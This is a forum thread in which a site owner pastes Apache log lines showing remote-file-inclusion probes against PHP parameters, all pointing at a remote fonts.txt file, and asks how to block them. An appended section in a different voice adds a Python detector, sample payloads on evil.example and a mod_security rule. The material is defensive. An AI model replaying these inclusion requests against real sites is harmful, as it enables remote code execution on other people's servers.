The Community Forums


Anybody know how to block this specific PHP inject attack using mod_security?

Discussion in 'Security' started by smksa, Jun 16, 2008.

  1. smksa

    smksa Member

    Joined:
    Aug 1, 2006
    Messages:
    21
    Likes Received:
    0
    Trophy Points:
    1
    Hi,

    I would like to request assistance.

    Does anybody know how to block the following "WEB-PHP remote include path" attack using mod_security?

    I have tried using the default mod_security rules and also the mod_security rules from
    http://www.timmit.nl/modsec2.user.conf.

    But it seems that mod_security is not functioning well, in that the PHP inject script is still able to run on my server.

    The following are the "WEB-PHP remote include path" requests that I mentioned, taken from the Apache access log.


    =================================

    127.0.0.1 - - [15/Jun/2008:15:09:02 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [15/Jun/2008:15:18:30 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [15/Jun/2008:15:18:31 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [15/Jun/2008:15:18:31 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    124.217.243.21 - - [15/Jun/2008:15:23:46 +0800] "GET /?HCL_path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 406 346
    124.217.243.21 - - [15/Jun/2008:15:23:47 +0800] "GET /?HCL_path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 406 346
    124.217.243.21 - - [15/Jun/2008:15:25:14 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    124.217.243.21 - - [15/Jun/2008:15:25:14 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    124.217.243.21 - - [15/Jun/2008:15:25:15 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    124.217.243.21 - - [15/Jun/2008:15:25:16 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [15/Jun/2008:15:29:07 +0800] "GET //config.inc.php?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
    127.0.0.1 - - [16/Jun/2008:01:48:17 +0800] "GET /?name=Club&op=members&cid=2//login.php%3fskin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:01:48:17 +0800] "GET /?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:01:51:27 +0800] "GET /?language=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:01:51:28 +0800] "GET /?language=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:01:54:25 +0800] "GET /?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:01:55:51 +0800] "GET /linux/9131.html//login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
    127.0.0.1 - - [16/Jun/2008:01:55:51 +0800] "GET //login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
    127.0.0.1 - - [16/Jun/2008:01:55:51 +0800] "GET /linux//login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
    127.0.0.1 - - [16/Jun/2008:01:55:57 +0800] "GET /mac/9194.html//login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
    127.0.0.1 - - [16/Jun/2008:01:55:57 +0800] "GET //login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
    127.0.0.1 - - [16/Jun/2008:01:55:57 +0800] "GET /mac//login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
    127.0.0.1 - - [16/Jun/2008:02:19:10 +0800] "GET /?module=pnForum&func=viewtopic&topic=813&=&newlang=deu//phpopenchat/contrib/yabbse/poc.php%3fsourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:02:19:11 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:02:19:25 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:02:19:38 +0800] "GET ///modules/My_eGallery/public/displayCategory.php?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
    127.0.0.1 - - [16/Jun/2008:02:21:37 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:02:24:26 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    124.217.243.21 - - [16/Jun/2008:02:24:36 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
    124.217.243.21 - - [16/Jun/2008:02:24:37 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:02:26:20 +0800] "GET /die.php?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 404 -
    127.0.0.1 - - [16/Jun/2008:02:26:21 +0800] "GET /die.php?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 404 -
    127.0.0.1 - - [16/Jun/2008:02:26:29 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:02:26:34 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:02:26:35 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:02:26:35 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    124.217.243.21 - - [16/Jun/2008:02:28:33 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
    124.217.243.21 - - [16/Jun/2008:02:31:34 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:02:34:59 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    124.217.243.21 - - [16/Jun/2008:02:35:10 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:02:37:44 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:02:38:03 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:02:40:06 +0800] "GET //index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
    124.217.243.21 - - [16/Jun/2008:02:42:47 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    124.217.243.21 - - [16/Jun/2008:02:42:48 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    124.217.243.21 - - [16/Jun/2008:02:42:48 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:02:48:47 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:02:48:49 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:03:00:19 +0800] "GET /?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:03:04:12 +0800] "GET /?name=Sitemap//modules/My_eGallery/public/displayCategory.php%3fbasepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:03:04:12 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:03:10:08 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    127.0.0.1 - - [16/Jun/2008:03:10:09 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
    124.217.243.21 - - [16/Jun/2008:11:16:49 +0800] "GET /kb/php_joomla//libraries/joomla/application/router.php?path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 404 -
    124.217.243.21 - - [16/Jun/2008:11:16:50 +0800] "GET /libraries/joomla/application/router.php?path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 404 -
    124.217.243.21 - - [16/Jun/2008:11:16:50 +0800] "GET /kb//libraries/joomla/application/router.php?path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 404 -

    ====================================



    I would appreciate it if anybody can help to stop this attack.

    Thank you,

    Regards,
    Sham
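The requests in the excerpt above are remote-file-inclusion (RFI) probes: a query parameter such as `path_escape`, `basepath` or `mosConfig_absolute_path` is set to a URL ending in `??`, in the hope that a PHP script passes it straight to `include()`. Some lines carry the terminator single-encoded (`%3f%3f`), some double-encoded (`%253f%253f`), and some raw (`??`), which is exactly what a blocking rule has to normalise before matching. The script below is an added example, not code from the forum post or from cPanel or mod_security: it parses lines in the post's log format, fully URL-decodes every parameter, flags values that are themselves URLs, and reports whether the server's status suggests the request was denied. The sample log, the host `evil.example`, and the set of "blocked" statuses are constructed assumptions, not data from the page.

```python
"""Flag remote-file-inclusion (RFI) attempts in Apache access-log lines.

Added example, not code from the forum post or from cPanel/mod_security.
It applies the same check a mod_security rule on ARGS would apply: fully
URL-decode every query parameter (the excerpt shows both %3f%3f and
double-encoded %253f%253f) and flag any value that is itself a URL.
"""
import re
from urllib.parse import parse_qsl, unquote

# Apache "common" log format, as in the post's excerpt.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# A parameter value that is itself a URL or a PHP stream wrapper is what an
# include()/require() on attacker-controlled input would fetch.
RFI_VALUE_RE = re.compile(r'^(?:(?:https?|ftps?)://|php://|data:)', re.IGNORECASE)

# Assumption: HTTP statuses the WAF's deny action returns. The 406s in the
# excerpt look like a mod_security deny; 403 is the other common choice.
BLOCKED_STATUSES = {403, 406}


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """URL-decode until the string stops changing, so %253f -> %3f -> ?."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_line(line: str):
    """Split one access-log line into its fields; None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['status'] = int(rec['status'])
    path, _, query = rec['target'].partition('?')
    rec['path'] = path
    # parse_qsl decodes one layer; fully_decode strips any remaining layers.
    rec['args'] = [(fully_decode(k), fully_decode(v))
                   for k, v in parse_qsl(query, keep_blank_values=True)]
    return rec


def find_rfi(line: str) -> list:
    """Return one finding per query parameter whose value is a remote URL."""
    rec = parse_line(line)
    if rec is None:
        return []
    findings = []
    for name, value in rec['args']:
        value = value.strip()
        if not RFI_VALUE_RE.match(value):
            continue
        findings.append({
            'ip': rec['ip'],
            'status': rec['status'],
            'path': rec['path'],
            'param': name,
            'url': value,
            # A trailing '?' turns whatever the vulnerable script appends
            # (e.g. '/config.php') into the query string of the attacker's
            # URL, so the remote file is fetched exactly as hosted.
            'terminator': value.endswith('?'),
            'blocked': rec['status'] in BLOCKED_STATUSES,
        })
    return findings


def scan(log_text: str) -> list:
    """Run find_rfi over every line of a log, in file order."""
    results = []
    for line in log_text.splitlines():
        results.extend(find_rfi(line))
    return results


# Constructed sample in the shape of the post's excerpt: loopback IP,
# placeholder host evil.example, parameter names taken from the post.
SAMPLE_LOG = """\
127.0.0.1 - - [15/Jun/2008:15:09:02 +0800] "GET /?path_escape=http://evil.example/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [15/Jun/2008:15:23:46 +0800] "GET /?HCL_path=http://evil.example/fonts.txt%253f%253f HTTP/1.1" 406 346
127.0.0.1 - - [16/Jun/2008:02:40:06 +0800] "GET //index2.php?_REQUEST=&GLOBALS=&mosConfig_absolute_path=http://evil.example/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:03:00:19 +0800] "GET /?_REQUEST%255boption%255d=com_content&mosConfig_absolute_path=http://evil.example/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:09:00:00 +0800] "GET /index.php?option=com_content&id=12 HTTP/1.1" 200 5120
127.0.0.1 - - [16/Jun/2008:09:00:01 +0800] "GET /redirect.php?url=http%3A%2F%2Fevil.example%2Fshell.txt HTTP/1.1" 200 220
"""

if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        verdict = 'blocked' if f['blocked'] else 'NOT blocked'
        print(f"{f['ip']} {f['path']} {f['param']}={f['url']} -> {f['status']} ({verdict})")
```

The mod_security 2 equivalent of `find_rfi` is a rule over `ARGS`, for example `SecRule ARGS "@rx ^(?:https?|ftps?)://" "phase:2,t:urlDecodeUni,t:lowercase,deny,status:406,msg:'RFI attempt'"` (2.7 and later also require an `id:` action). mod_security already URL-decodes `ARGS` once when it parses the request; the extra `t:urlDecodeUni` transformation is what catches the `%253f%253f` double-encoded variants in the excerpt, so a rule without it would pass those through. Two caveats a practitioner would check: a WAF rule is a mitigation, not a fix, since the root cause is a PHP script that passes user input to `include()` while `allow_url_include`/`allow_url_fopen` is enabled (setting `allow_url_include = Off` in php.ini removes the remote-include case regardless of the WAF); and a 200 status in the log only shows that the request was served, not that anything was included, so confirming a compromise means inspecting the script that handles that parameter and the server's error log rather than relying on the access log alone.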
     
